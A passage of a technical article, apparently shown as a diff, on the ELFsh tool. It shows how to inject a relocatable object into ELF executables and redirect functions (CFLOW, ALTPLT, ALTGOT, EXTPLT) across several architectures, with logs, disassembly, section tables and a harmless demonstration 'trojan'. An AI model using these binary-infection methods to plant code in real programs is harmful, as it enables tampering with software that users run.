+ [*] Sun Jul 31 15:30:14 2005 - New object a.out loaded
+
+ ~load rel.o
+
+ [*] Sun Jul 31 15:30:14 2005 - New object rel.o loaded
+
+ ~reladd 1 2
+ Section Mirrored Successfully !
+
+ [*] ET_REL rel.o injected succesfully in ET_EXEC a.out
+
+ ~redir puts puts_troj
+
+ [*] Function puts redirected to addr 0x08047164 <puts_troj>
+
+ ~redir legit_func hook_func
+
+ [*] Function legit_func redirected to addr 0x08047134 <hook_func>
+
+ ~save fake_aout
+
+ [*] Object fake_aout saved successfully
+
+ ~quit
+
+ [*] Unloading object 1 (rel.o)
+ [*] Unloading object 2 (a.out) *
+         .:: Bye -:: The ELF shell 0.65
+
+ ========= END DUMP 10 =========
+
+
+	   Let's now execute the modified binary.
+
+	   
+ ========= BEGIN DUMP 11 =========
+
+ elfsh@WTH $ ./fake_aout
+
+ First_printf test
+ Trojan injected ET_REL takes control now [Z:First_puts:42:43:44:45:1]
+ extcall!
+ First_puts
+ calling write
+ Second_printf test
+ Trojan injected ET_REL takes control now [Z:Second_puts:42:43:44:45:1]
+ extcall!
+ Second_puts
+ calling write
+ HOOK FUNC test !
+ Trojan injected ET_REL takes control now [Z:LEGIT FUNC:42:43:44:45:1]
+ extcall!
+ calling write
+ legit func (test) !
+ elfsh@WTH $
+
+ =========  END DUMP 11 =========
+
+
+	   Fine. Clearly legit_func has been redirected on the hook 
+	   function, and hook_func takes care of calling back the
+	   legit_func using the old symbol technique described in
+	   the first issue of the Cerberus articles serie.
+
+	   Let's see the original legit_func code which is redirected
+	   using the CFLOW technique on the x86 architecture :
+	   
+
+ ========= BEGIN DUMP 12 =========
+
+ 080484C0 legit_func + 0        push   %ebp                             
+ 080484C1 legit_func + 1        mov    %esp,%ebp                        
+ 080484C3 legit_func + 3        sub    $8,%esp                          
+ 080484C6 legit_func + 6        mov    $<_IO_stdin_used + 4>,(%esp,1)   
+ 080484CD legit_func + 13       call   <.plt + 32>                      
+ 080484D2 legit_func + 18       mov    $<_IO_stdin_used + 15>,(%esp,1)  
+
+ ========= END DUMP 12 =========
+
+
+	   Now the modified code:
+
+
+ ========= BEGIN DUMP 13 =========
+
+ 080484C0 legit_func + 0        jmp    <hook_legit_func>               
+ 080484C5 legit_func + 5        nop                                    
+ 080484C6 legit_func + 6        mov    $<_IO_stdin_used + 4>,(%esp,1)  
+ 080484CD legit_func + 13       call   <puts>                          
+ 080484D2 legit_func + 18       mov    $<_IO_stdin_used + 15>,(%esp,1) 
+ 080484D9 legit_func + 25       mov    8(%ebp),%eax                    
+ 080484DC legit_func + 28       mov    %eax,4(%esp,1)                  
+ 080484E0 legit_func + 32       call   <printf>                        
+ 080484E5 legit_func + 37       leave                                  
+ 080484E6 legit_func + 38       xor    %eax,%eax                       
+
+ ========= END DUMP 13 =========
+
+ 
+	We create a new section .elfsh.hooks whoose data is an array 
+	of hook code stubs like this one:
+
+
+ ========= BEGIN DUMP 14 =========
+
+ 08042134 hook_legit_func + 0   jmp    <hook_func>                     
+ 08042139 old_legit_func  + 0   push   %ebp                            
+ 0804213A old_legit_func  + 1   mov    %esp,%ebp                       
+ 0804213C old_legit_func  + 3   sub    $8,%esp                         
+ 0804213F old_legit_func  + 6   jmp    <legit_func + 6>                
+
+ ========= END DUMP 14 =========
+
+
+	 Because we want to be able to recall the original function
+	 (legit_func), we add the erased bytes of it, just after the
+	 first jmp. Then we call back the legit_func at the good offset
+	 (so that we do not recurse inside the hook because the function
+	 was hijacked), as you can see starting at the old_legit_func 
+	 symbol of example 14.
+
+	 This old symbols technique is coherent with the ALTPLT technique
+	 that we published in the first article. We can as well use
+	 the old_funcname() call inside the injected C code for 
+	 calling back the good hijacked function, and we do that without
+	 a single byte restoration at runtime. That is why the CFLOW
+	 technique is PaX compatible.
+
+	 For the MIPS architecture, the CFLOW technique is quite similar, 
+	 we can see the result of it as well (DUMP 15 is the original
+	 binary and DUMP 16 the modified one):
+
+
+ ======== BEGIN DUMP 15 =========
+
+ 400400 <func>:        lui     gp,0xfc1
+ 400404 <func+4>:      addiu   gp,gp,-21696
+ 400408 <func+8>:      addu    gp,gp,t9
+ 40040c <func+12>:     addiu   sp,sp,-40
+ 400410 <func+16>:     sw      ra,36(sp)
+ [...]
+
+ ======== END DUMP 15 =========
+
+	  
+	  The modified func code is now :
+
+	 
+ ======== BEGIN DUMP 16 =========
+
+ <func>
+ 400400:       addi    t9,t9,104	 # Register T9 as target function
+ 400404:       j       0x400468 <func2>	 # Direct JMP on hook function 
+ 400408:       nop			 # Delay slot 
+ 40040c:       addiu   sp,sp,-40	 # The original func code 
+ 400410:       sw      ra,36(sp)
+ 400414:       sw      s8,32(sp)
+ 400418:       move    s8,sp
+ 40041c:       sw      gp,16(sp)
+ 400420:       sw      a0,40(s8)
+
+ ======== END DUMP 16 =========
+
+
+	  The func2 function can be anything we want, provided that it has
+	  the same number and type of parameters. When the func2 function
+	  wants to call the original function (func), then it jumps on 
+	  the old_func symbol that points inside the .elfsh.hooks section
+	  entry for this CFLOW hook. That is how looks like such a hooks
+	  entry on the MIPS architecture :
+
+
+ ======== BEGIN DUMP 17 ========= 
+ 
+ <old_func>
+ 3ff0f4         addi    t9,t9,4876
+ 3ff0f8         lui     gp,0xfc1
+ 3ff0fc         addiu   gp,gp,-21696
+ 3ff100         addu    gp,gp,t9
+ 3ff104         j       0x400408 <func + 8>
+ 3ff108         nop
+ 3ff10c         nop
+
+ ======== END DUMP 17 ===========
+
+
+	  As you can see, the three instructions that got erased for
+	  installing the CFLOW hook at the beginning of func() are
+	  now located in the hook entry for func(), pointed by
+	  the old_func symbol. The T9 register is also reset so that
+	  we can come back to a safe situation before jumping back
+	  on func + 8.
+
+
+
+---[ B. ALTPLT technique revised
+
+
+     ALTPLT technique v1 was presented in the Cerberus ELF Interface [0]
+     paper. As already stated, it was not satisfying because it was
+     removing the hook on SPARC at the first original function call. 
+
+     Since on SPARC the first 4 PLT entries are reserved, there is
+     room for 12 instructions that would fix anything needed (actually
+     the first PLT entry) at the moment when ALTPLT+0 takes control.
+     
+     ALTPLTv2 is working indeed in 12 instructions but it needed to	
+     reencode the first ALTPLT section entry with the code from PLT+0 
+     (which is relocated in runtime on SPARC before the main takes 
+     control, which explains why we cannot patch this on the disk 
+     statically).
+
+     By this behavior, it breaks PaX, and the implementation is
+     very architecture dependant since its SPARC assembly. For those
+     who want to see it, we let the code of this in the ELFsh source 
+     tree in libelfsh/sparc32.c .
+
+     For the ALPHA64 architecture, it gives pretty much the same in its
+     respective instructions set, and this time the implementation is
+     located in libelfsh/alpha64.c .
+
+     As you can see in the code (that we will not reproduce here for
+     clarity of the article), ALTPLTv2 is a real pain and we needed to 
+     get rid of all this assembly code that was requesting too much 
+     efforts for potential future ports of this technique to other 
+     architectures.
+
+     Then we found the .dynamic DT_PLTREL trick and we tried to see what
+     happened when changing this .dynamic entry inside the host binary.
+     Changing the DT_PLTREL entry is very attractive since this is
+     completely architecture independant so it works everywhere.
+
+     Let's see how look like the section header table and the .dynamic 
+     section used in the really simple ALTPLTv3 technique. We use the 
+     .elfsh.altplt section as a mirror of the original .plt as explained 
+     in our first paper. The other .elfsh.* sections has been explained 
+     already or will be just after the log.
+
+     The output (modified) binary looks like :
+
+
+ =============== BEGIN DUMP 18 ================
+
+ [SECTION HEADER TABLE .::. SHT is not stripped]
+ [Object fake_aout]
+
+ [000] 0x00000000 -------                 foff:00000000 sz:0000000 link:00
+ [001] 0x08042134 a-x---- .elfsh.hooks    foff:00000308 sz:0000016 link:00
+ [002] 0x08043134 a-x---- .elfsh.extplt   foff:00004404 sz:0000048 link:00
+ [003] 0x08044134 a-x---- .elfsh.altplt   foff:00008500 sz:0004096 link:00
+ [004] 0x08045134 a--ms-- rel.o.rodata.str1.32 foff:12596 sz:4096  link:00
+ [005] 0x08046134 a--ms-- rel.o.rodata.str1.1  foff:16692 sz:4096  link:00
+ [006] 0x08047134 a-x---- rel.o.text      foff:00020788 sz:0004096 link:00
+ [007] 0x08048134 a------ .interp         foff:00024884 sz:0000019 link:00
+ [008] 0x08048148 a------ .note.ABI-tag   foff:00024904 sz:0000032 link:00
+ [009] 0x08048168 a------ .hash           foff:00024936 sz:0000064 link:10
+ [010] 0x080481A8 a------ .dynsym         foff:00025000 sz:0000176 link:11
+ [011] 0x08048258 a------ .dynstr         foff:00025176 sz:0000112 link:00
+ [012] 0x080482C8 a------ .gnu.version    foff:00025288 sz:0000022 link:10
+ [013] 0x080482E0 a------ .gnu.version_r  foff:00025312 sz:0000032 link:11
+ [014] 0x08048300 a------ .rel.dyn        foff:00025344 sz:0000016 link:10
+ [015] 0x08048310 a------ .rel.plt        foff:00025360 sz:0000056 link:10
+ [016] 0x08048348 a-x---- .init           foff:00025416 sz:0000023 link:00
+ [017] 0x08048360 a-x---- .plt            foff:00025440 sz:0000128 link:00
+ [018] 0x08048400 a-x---- .text           foff:00025600 sz:0000736 link:00
+ [019] 0x080486E0 a-x---- .fini           foff:00026336 sz:0000027 link:00
+ [020] 0x080486FC a------ .rodata         foff:00026364 sz:0000116 link:00
+ [021] 0x08048770 a------ .eh_frame       foff:00026480 sz:0000004 link:00
+ [022] 0x08049774 aw----- .ctors          foff:00026484 sz:0000008 link:00
+ [023] 0x0804977C aw----- .dtors          foff:00026492 sz:0000008 link:00
+ [024] 0x08049784 aw----- .jcr            foff:00026500 sz:0000004 link:00
+ [025] 0x08049788 aw----- .dynamic        foff:00026504 sz:0000200 link:11
+ [026] 0x08049850 aw----- .got            foff:00026704 sz:0000004 link:00
+ [027] 0x08049854 aw----- .got.plt        foff:00026708 sz:0000040 link:00
+ [028] 0x0804987C aw----- .data           foff:00026748 sz:0000012 link:00
+ [029] 0x08049888 aw----- .bss            foff:00026760 sz:0000008 link:00
+ [030] 0x08049890 aw----- rel.o.bss       foff:00026768 sz:0004096 link:00
+ [031] 0x0804A890 aw----- rel.o.data      foff:00030864 sz:0000004 link:00
+ [032] 0x0804A894 aw----- .elfsh.altgot   foff:00030868 sz:0000048 link:00
+ [033] 0x0804A8E4 aw----- .elfsh.dynsym   foff:00030948 sz:0000208 link:34
+ [034] 0x0804AA44 aw----- .elfsh.dynstr   foff:00031300 sz:0000127 link:33
+ [035] 0x0804AB24 aw----- .elfsh.reldyn   foff:00031524 sz:0000016 link:00
+ [036] 0x0804AB34 aw----- .elfsh.relplt   foff:00031540 sz:0000072 link:00
+ [037] 0x00000000 ------- .comment        foff:00031652 sz:0000665 link:00
+ [038] 0x00000000 ------- .debug_aranges  foff:00032324 sz:0000120 link:00
+ [039] 0x00000000 ------- .debug_pubnames foff:00032444 sz:0000042 link:00
+ [040] 0x00000000 ------- .debug_info     foff:00032486 sz:0006871 link:00
+ [041] 0x00000000 ------- .debug_abbrev   foff:00039357 sz:0000511 link:00
+ [042] 0x00000000 ------- .debug_line     foff:00039868 sz:0000961 link:00
+ [043] 0x00000000 ------- .debug_frame    foff:00040832 sz:0000072 link:00
+ [044] 0x00000000 ---ms-- .debug_str      foff:00040904 sz:0008067 link:00
+ [045] 0x00000000 ------- .debug_macinfo  foff:00048971 sz:0029295 link:00
+ [046] 0x00000000 ------- .shstrtab       foff:00078266 sz:0000507 link:00
+ [047] 0x00000000 ------- .symtab         foff:00080736 sz:0002368 link:48
+ [048] 0x00000000 ------- .strtab         foff:00083104 sz:0001785 link:47
+
+ [SHT_DYNAMIC]
+ [Object ./testsuite/etrel_inject/etrel_original/fake_aout]
+
+ [00] Name of needed library            =>           libc.so.6 {DT_NEEDED}
+ [01] Address of init function          =>          0x08048348 {DT_INIT}
+ [02] Address of fini function          =>          0x080486E0 {DT_FINI}
+ [03] Address of symbol hash table      =>          0x08048168 {DT_HASH}
+ [04] Address of dynamic string table   =>          0x0804AA44 {DT_STRTAB}
+ [05] Address of dynamic symbol table   =>          0x0804A8E4 {DT_SYMTAB}
+ [06] Size of string table              =>      00000127 bytes {DT_STRSZ}
+ [07] Size of symbol table entry        =>      00000016 bytes {DT_SYMENT}
+ [08] Debugging entry (unknown)         =>          0x00000000 {DT_DEBUG}
+ [09] Processor defined value           =>          0x0804A894 {DT_PLTGOT}
+ [10] Size in bytes for .rel.plt        =>      000072 bytes {DT_PLTRELSZ}
+ [11] Type of reloc in PLT              =>            00000017 {DT_PLTREL}
+ [12] Address of .rel.plt               =>          0x0804AB34 {DT_JMPREL}
+ [13] Address of .rel.got section       =>          0x0804AB24 {DT_REL}
+ [14] Total size of .rel section        =>      00000016 bytes {DT_RELSZ}
+ [15] Size of a REL entry               =>      00000008 bytes {DT_RELENT}
+ [16] SUN needed version table          =>          0x80482E0 {DT_VERNEED}
+ [17] SUN needed version number         =>             001 {DT_VERNEEDNUM}
+ [18] GNU version VERSYM                =>          0x080482C8 {DT_VERSYM}
+
+ =============== END DUMP 18 ================
+     
+
+	As you can see, various sections has been copied and extended,	
+	and their entries in .dynamic changed. That holds for .got 
+	(DT_PLTGOT), .rel.plt (DT_JMPREL), .dynsym (DT_SYMTAB), and
+	.dynstr (DT_STRTAB). Changing those entries allow for the 
+	new ALTPLT technique without any line of assembly.
+
+	Of course the ALTPLT technique version 3 does not need any
+	non-mandatory information like debug sections. It may sound
+	obvious but some peoples really asked this question.
+
+
+
+---[ C. ALTGOT technique : the RISC complement			
+
+
+	       On the MIPS architecture, calls to PLT entries are 
+       done differently. Indeed, instead of a direct call instruction on 
+       the entry, an indirect jump is used for using the GOT entry linked
+       to the desired function. If such entry is filled, then the 
+       function is called directly. By default, the GOT entries contains 
+       the pointer on the PLT entries. During the execution eventually, 
+       the dynamic linker is called for relocating the GOT section (MIPS, 
+       x86) or the PLT section (on SPARC or ALPHA).
+
+       Here is the MIPS assembly log that prove this on some dumb 
+       helloworld program using printf :
+
+       00400790 <main>:
+       400790:  3c1c0fc0   lui     gp,0xfc0	  # Set GP to GOT base
+       400794:  279c78c0   addiu   gp,gp,30912    # address + 0x7ff0
+       400798:  0399e021   addu    gp,gp,t9	  # using t9 (= main)
+       40079c:  27bdffe0   addiu   sp,sp,-32	  
+       4007a0:  afbf001c   sw      ra,28(sp)
+       4007a4:  afbe0018   sw      s8,24(sp)
+       4007a8:  03a0f021   move    s8,sp
+       4007ac:  afbc0010   sw      gp,16(sp)
+       4007b0:  8f828018   lw      v0,-32744(gp)
+       4007b4:  00000000   nop
+       4007b8:  24440a50   addiu   a0,v0,2640
+       4007bc:  2405002a   li      a1,42
+       4007c0:  8f828018   lw      v0,-32744(gp)
+       4007c4:  00000000   nop
+       4007c8:  24460a74   addiu   a2,v0,2676
+       4007cc:  8f99803c   lw      t9,-32708(gp)  # Load printf GOT entry
+       4007d0:  00000000   nop			   
+       4007d4:  0320f809   jalr    t9		  # and jump on it
+       4007d8:  00000000   nop
+       4007dc:  8fdc0010   lw      gp,16(s8)
+       4007e0:  00001021   move    v0,zero
+       4007e4:  03c0e821   move    sp,s8
+       4007e8:  8fbf001c   lw      ra,28(sp)
+       4007ec:  8fbe0018   lw      s8,24(sp)
+       4007f0:  27bd0020   addiu   sp,sp,32
+       4007f4:  03e00008   jr      ra		  # return from the func
+       4007f8:  00000000   nop
+       4007fc:  00000000   nop
+
+       We note that the global pointer register %gp is always set
+       on the GOT section base address on MIPS, more or less some
+       fixed signed offset, in our case 0x7ff0 (0x8000 on ALPHA).
+
+       In order to call a function whoose address is unknown, the GOT
+       entries are filled and then the indirect jump instruction  
+       on MIPS does not use the PLT entry anymore. What do we learn
+       from this ? Simply that we cannot rely on a classical PLT 
+       hijacking because the PLT entry code wont be called if the GOT 
+       entry is already filled, which means that we will hijack the 
+       function only the first time.
+
+       Because of this, we will hijack functions using GOT patching
+       on MIPS. However it does not resolve the problem of recalling
+       the original function. In order to allow such recall, we will
+       just insert the old_ symbols on the real PLT entry, so that
+       we can still access the dynamic linking mechanism code stub
+       even if the GOT has been modified.
+
+       Let's see the detailed results of the ALTGOT technique on the 
+       ALPHA and MIPS architecture. It was done without a single
+       line of assembly code which makes it very portable :
+
+
+ ========= BEGIN DUMP 19 =========
+
+ elfsh@alpha$ cat host.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int main()
+ {
+   char  *str;
+
+   str = malloc(10);
+   if (str == NULL)
+     goto err;
+   strcpy(str, "test");
+   printf("First_printf %s\n", str);
+   fflush(stdout);
+   puts("First_puts");
+   printf("Second_printf %u\n", 42);
+   puts("Second_puts");
+   fflush(stdout);
+   return (0);
+  err:
+   printf("Malloc problem %u\n", 42);
+   return (-1);
+ }
+
+ elfsh@alpha$ gcc host.c -o a.out
+ elfsh@alpha$ file ./a.out
+ a.out: ELF 64-bit LSB executable, Alpha (unofficial), for NetBSD 2.0G,
+       dynamically linked, not stripped
+
+ ========= END DUMP 19 =========
+
+
+	   The original binary executes:
+
+
+ ========= BEGIN DUMP 20 =========
+
+ elfsh@alpha$ ./a.out
+ First_printf test
+ First_puts
+ Second_printf 42
+ Second_puts
+
+ ========= END DUMP 20 ==========
+
+
+	   Let's look again the relocatable object we are injecting:
+
+
+ ========= BEGIN DUMP 21 =========
+
+ elfsh@alpha$ cat rel.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int     glvar_testreloc = 42;
+
+ int     glvar_testreloc_bss;
+ char    glvar_testreloc_bss2;
+ short   glvar_testreloc_bss3;
+
+
+ int     puts_troj(char *str)
+ {
+   int   local = 1;
+   char  *str2;
+
+   str2 = malloc(10);
+   *str2 = 'Z';
+   *(str2 + 1) = 0x00;
+
+   glvar_testreloc_bss  = 43;
+   glvar_testreloc_bss2 = 44;
+   glvar_testreloc_bss3 = 45;
+
+   printf("Trojan injected ET_REL takes control now "
+         "[%s:%s:%u:%u:%hhu:%hu:%u] \n",
+         str2, str,
+         glvar_testreloc,
+         glvar_testreloc_bss,
+         glvar_testreloc_bss2,
+         glvar_testreloc_bss3,
+         local);
+
+   old_puts(str);
+   fflush(stdout);
+   return (0);
+ }
+
+ int     func2()
+ {
+   return (42);
+ }
+
+ ========= END DUMP 21 =========
+
+
+	   As you can see, the relocatable object rel.c uses old_ symbols
+	   which means that it relies on the ALTPLT technique. However
+	   we do not perform EXTPLT technique on ALPHA and MIPS yet so
+	   we are not able to call unknown function from the binary on 
+	   those architectures for now. Our rel.c is a copy from the one 
+	   in example 7 without the calls to the unknown functions
+	   write and putchar of example 7.
+
+	   Now we inject the stuff:
+
+
+ ========= BEGIN DUMP 22 =========
+
+ elfsh@alpha$ ./relinject.esh > relinject.out
+ elfsh@alpha$ ./fake_aout
+ First_printf test
+ Trojan injected ET_REL takes control now [Z:First_puts:42:43:44:45:1]
+ First_puts
+ Second_printf 42
+ Trojan injected ET_REL takes control now [Z:Second_puts:42:43:44:45:1]
+ Second_puts
+
+ ========= END DUMP 22 ==========
+
+
+	The section list on ALPHA is then as follow. A particular
+	look at the injected sections is recommended :	
+
+
+ ========= BEGIN DUMP 23 =========
+
+ elfsh@alpha$ elfsh -f fake_aout -s -p
+
+ [*] Object fake_aout has been loaded (O_RDONLY)
+
+ [SECTION HEADER TABLE .::. SHT is not stripped]
+ [Object fake_aout]
+
+ [000] 0x000000000 -------                     foff:00000 sz:00000
+ [001] 0x120000190 a------ .interp             foff:00400 sz:00023
+ [002] 0x1200001A8 a------ .note.netbsd.ident  foff:00424 sz:00024
+ [003] 0x1200001C0 a------ .hash               foff:00448 sz:00544
+ [004] 0x1200003E0 a------ .dynsym             foff:00992 sz:00552
+ [005] 0x120000608 a------ .dynstr             foff:01544 sz:00251
+ [006] 0x120000708 a------ .rela.dyn           foff:01800 sz:00096
+ [007] 0x120000768 a------ .rela.plt           foff:01896 sz:00168
+ [008] 0x120000820 a-x---- .init               foff:02080 sz:00128
+ [009] 0x1200008A0 a-x---- .text               foff:02208 sz:01312
+ [010] 0x120000DC0 a-x---- .fini               foff:03520 sz:00104
+ [011] 0x120000E28 a------ .rodata             foff:03624 sz:00162
+ [012] 0x120010ED0 aw----- .data               foff:03792 sz:00000
+ [013] 0x120010ED0 a------ .eh_frame           foff:03792 sz:00004
+ [014] 0x120010ED8 aw----- .dynamic            foff:03800 sz:00352
+ [015] 0x120011038 aw----- .ctors              foff:04152 sz:00016
+ [016] 0x120011048 aw----- .dtors              foff:04168 sz:00016
+ [017] 0x120011058 aw----- .jcr                foff:04184 sz:00008
+ [018] 0x120011060 awx---- .plt                foff:04192 sz:00116
+ [019] 0x1200110D8 aw----- .got                foff:04312 sz:00240
+ [020] 0x1200111C8 aw----- .sdata              foff:04552 sz:00024
+ [021] 0x1200111E0 aw----- .sbss               foff:04576 sz:00024
+ [022] 0x1200111F8 aw----- .bss                foff:04600 sz:00056
+ [023] 0x120011230 a-x---- rel.o.text          foff:04656 sz:00320
+ [024] 0x120011370 aw----- rel.o.sdata         foff:04976 sz:00008
+ [025] 0x120011378 a--ms-- rel.o.rodata.str1.1 foff:04984 sz:00072
+ [026] 0x1200113C0 a-x---- .alt.plt.prolog     foff:05056 sz:00048
+ [027] 0x1200113F0 a-x---- .alt.plt            foff:05104 sz:00120
+ [028] 0x120011468 a------ .alt.got            foff:05224 sz:00072
+ [029] 0x1200114B0 aw----- rel.o.got           foff:05296 sz:00080
+ [030] 0x000000000 ------- .comment            foff:05376 sz:00240
+ [031] 0x000000000 ------- .debug_aranges      foff:05616 sz:00048
+ [032] 0x000000000 ------- .debug_pubnames     foff:05664 sz:00027
+ [033] 0x000000000 ------- .debug_info         foff:05691 sz:02994
+ [034] 0x000000000 ------- .debug_abbrev       foff:08685 sz:00337
+ [035] 0x000000000 ------- .debug_line         foff:09022 sz:00373
+ [036] 0x000000000 ------- .debug_frame        foff:09400 sz:00048
+ [037] 0x000000000 ---ms-- .debug_str          foff:09448 sz:01940
+ [038] 0x000000000 ------- .debug_macinfo      foff:11388 sz:12937
+ [039] 0x000000000 ------- .ident              foff:24325 sz:00054
+ [040] 0x000000000 ------- .shstrtab           foff:24379 sz:00393
+ [041] 0x000000000 ------- .symtab             foff:27527 sz:02400
+ [042] 0x000000000 ------- .strtab             foff:29927 sz:00948
+
+ [Program header table .::. PHT]
+ [Object fake_aout]
+
+ [00] 0x120000040 -> 0x120000190 r-x  => Program header table
+ [01] 0x120000190 -> 0x1200001A7 r--  => Program interpreter
+ [02] 0x120000000 -> 0x120000ECA r-x  => Loadable segment
+ [03] 0x120010ED0 -> 0x120011510 rwx  => Loadable segment
+ [04] 0x120010ED8 -> 0x120011038 rw-  => Dynamic linking info
+ [05] 0x1200001A8 -> 0x1200001C0 r--  => Auxiliary information
+
+ [Program header table .::. SHT correlation]
+ [Object fake_aout]
+
+ [*] SHT is not stripped
+
+ [00] PT_PHDR
+ [01] PT_INTERP         .interp
+ [02] PT_LOAD           .interp .note.netbsd.ident .hash .dynsym .dynstr
+                        .rela.dyn .rela.plt .init .text .fini .rodata
+ [03] PT_LOAD           .data .eh_frame .dynamic .ctors .dtors .jcr .plt
+                        .got .sdata .sbss .bss rel.o.text rel.o.sdata
+                        rel.o.rodata.str1.1 .alt.plt.prolog .alt.plt
+                        .alt.got rel.o.got
+ [04] PT_DYNAMIC        .dynamic
+ [05] PT_NOTE           .note.netbsd.ident
+
+ [*] Object fake_aout unloaded
+
+ ========= END DUMP 23 =========
+
+
+	  Segments are extended the good way. We see this because of
+	  the correlation between SHT and PHT : all bounds are correct.
+	  the end. The .alt.plt.prolog section is there for implementing
+	  the ALTPLTv2 on ALPHA. This could will patch in runtime the
+	  first ALTPLT entry bytes with the first PLT entry bytes on
+	  the first time that ALTPLT first entry is called (when calling
+	  some original function from a hook function for the first time).
+	  
+	  When we discovered how to do the ALTPLTv3 (without a line
+	  of assembly), then .alt.plt.prolog just became a padding
+	  section so that GOT and ALTGOT were well aligned on some
+	  size that was necessary for setting up ALTPLT because of
+	  the ALPHA instruction encoding of indirect control flow
+	  jumps.
+
+
+---[ D. EXTPLT technique : unknown function postlinking
+
+
+	  This technique is one of the major one of the new ELFsh
+	  version. It works on ET_EXEC and ET_DYN files, including   
+	  when the injection is done directly in memory. EXTPLT	     
+	  consists in adding a new section (.elfsh.extplt) so that   
+	  we can add entries for new functions. 
+
+	  When coupled to .rel.plt, .got, .dynsym, and .dynstr mirroring 
+	  extensions, it allows for placing relocation entries that match 
+	  the needs of the new ALTPLT/ALTGOT couple. Let's look at the 
+	  additional relocation information using the elfsh -r command.
+ 
+	  First, let see the original binary relocation table:
+
+ 
+ ========= BEGIN DUMP 24 =========
+
+ [*] Object ./a.out has been loaded (O_RDONLY) 
+
+ [RELOCATION TABLES]
+ [Object ./a.out]
+
+ {Section .rel.dyn} 
+ [000] R_386_GLOB_DAT  0x08049850 sym[010] : __gmon_start__   
+ [001] R_386_COPY      0x08049888 sym[004] : stdout           
+
+ {Section .rel.plt} 
+ [000] R_386_JMP_SLOT  0x08049860 sym[001] : fflush           
+ [001] R_386_JMP_SLOT  0x08049864 sym[002] : puts             
+ [002] R_386_JMP_SLOT  0x08049868 sym[003] : malloc           
+ [003] R_386_JMP_SLOT  0x0804986C sym[005] : __libc_start_main
+ [004] R_386_JMP_SLOT  0x08049870 sym[006] : printf           
+ [005] R_386_JMP_SLOT  0x08049874 sym[007] : free             
+ [006] R_386_JMP_SLOT  0x08049878 sym[009] : read             
+
+ [*] Object ./testsuite/etrel_inject/etrel_original/a.out unloaded 
+	  
+ ========= END DUMP 24 =========
+
+
+	    Let's now see the modified binary relocation tables:
+
+
+ ========= BEGIN DUMP 25 =========
+	  
+ [*] Object fake_aout has been loaded (O_RDONLY) 
+
+ [RELOCATION TABLES]
+ [Object ./fake_aout]
+
+ {Section .rel.dyn} 
+ [000] R_386_GLOB_DAT  0x08049850 sym[010] : __gmon_start__   
+ [001] R_386_COPY      0x08049888 sym[004] : stdout           
+
+ {Section .rel.plt} 
+ [000] R_386_JMP_SLOT  0x0804A8A0 sym[001] : fflush           
+ [001] R_386_JMP_SLOT  0x0804A8A4 sym[002] : puts             
+ [002] R_386_JMP_SLOT  0x0804A8A8 sym[003] : malloc           
+ [003] R_386_JMP_SLOT  0x0804A8AC sym[005] : __libc_start_main
+ [004] R_386_JMP_SLOT  0x0804A8B0 sym[006] : printf           
+ [005] R_386_JMP_SLOT  0x0804A8B4 sym[007] : free             
+ [006] R_386_JMP_SLOT  0x0804A8B8 sym[009] : read             
+
+ {Section .elfsh.reldyn} 
+ [000] R_386_GLOB_DAT  0x08049850 sym[010] : __gmon_start__   
+ [001] R_386_COPY      0x08049888 sym[004] : stdout           
+
+ {Section .elfsh.relplt} 
+ [000] R_386_JMP_SLOT  0x0804A8A0 sym[001] : fflush           
+ [001] R_386_JMP_SLOT  0x0804A8A4 sym[002] : puts             
+ [002] R_386_JMP_SLOT  0x0804A8A8 sym[003] : malloc           
+ [003] R_386_JMP_SLOT  0x0804A8AC sym[005] : __libc_start_main
+ [004] R_386_JMP_SLOT  0x0804A8B0 sym[006] : printf           
+ [005] R_386_JMP_SLOT  0x0804A8B4 sym[007] : free             
+ [006] R_386_JMP_SLOT  0x0804A8B8 sym[009] : read             
+ [007] R_386_JMP_SLOT  0x0804A8BC sym[011] : _IO_putc         
+ [008] R_386_JMP_SLOT  0x0804A8C0 sym[012] : write            
+
+ [*] Object fake_aout unloaded 
+
+ =========  END DUMP 25 =========     
+
+
+	    As you see, _IO_putc (internal name for putchar) and write 
+	    functions has been used in the injected object. We had to 
+	    insert them inside the host binary so that the output binary 
+	    can work.
+	    
+	    The .elfsh.relplt section is copied from the .rel.plt
+	    section but with a doubled size so that we have room
+	    for additional entries. Even if we extend only one of the
+	    relocation table, both tables needs to be copied, because
+	    on ET_DYN files, the rtld will assume that both tables
+	    are adjacent in memory, so we cannot just copy .rel.plt
+	    but also need to keep .rel.dyn (aka .rel.got) near the
+	    .rel.plt copy. That is why you can see with .elfsh.reldyn
+	    and .elfsh.relplt .
+
+	    When extra symbols are needed, more sections are moved
+	    after the BSS, including .dynsym and .dynstr.
+
+
+---[ E. IA32, SPARC32/64, ALPHA64, MIPS32 compliant algorithms		 
+
+
+	  Let's now give all algorithms details about the techniques we
+	  introduced by the practice in the previous paragraphs. We
+	  cover here all pseudos algorithms for ELF redirections. More
+	  constrained debugging detailed algorithms are given at the end 
+	  of the next part.
+
+	  Because of ALTPLT and ALTGOT techniques are so complementary, 
+	  we implemented them inside only one algorithm that we give
+	  now. There is no conditions on the SPARC architecture since
+	  it is the default architecture case in the listing.
+
+	  The main ALTPLTv3 / ALTGOT algorithm (libelfsh/altplt.c) can be
+	  found in elfsh_build_plt() and elfsh_relink_plt(), is as 
+	  follow. 
+
+	  It could probably be cleaned if all the code go in architecture 
+	  dependant handlers but that would duplicate some code, so we 
+	  keep it like this :
+
+	  Multiarchitecture ALTPLT / ALTGOT algorithm
+	 +-------------------------------------------+
+
+	  0/ IF [ ARCH is MIPS AND PLT is not found AND File is dynamic ]
+	     [
+		- Get .text section base address
+		- Find MIPS opcodes fingerprint for embedded PLT 
+		  located inside .text
+		- Fixup SHT to include PLT section header
+	     ]
+
+	  1/ SWITCH on ELF architecture
+	  [
+             MIPS:
+		* Insert mapped .elfsh.gotprolog section
+		* Insert mapped .elfsh.padgot section
+	     ALPHA:
+	        * Insert mapped .elfsh.pltprolog section
+	     DEFAULT:
+	        * Insert mapped .elfsh.altplt section (copy of .plt)
+	  ]
+
+	  2/ IF [ ARCH is (MIPS or ALPHA or IA32) ]
+	  [
+		* Insert .elfsh.altgot section (copy of .got)
+	  ]
+
+	  3/ FOREACH (ALT)PLT ENTRY:
+	  [
+		IF [ FIRST PLT entry ]
+		[
+		   IF [ARCH is MIPS ]
+		   [
+			* Insert pairs of ld/st instructions in 
+			  .elfsh.gotprolog for copying extern variables 
+			  addresses fixed in GOT by the RTLD inside 
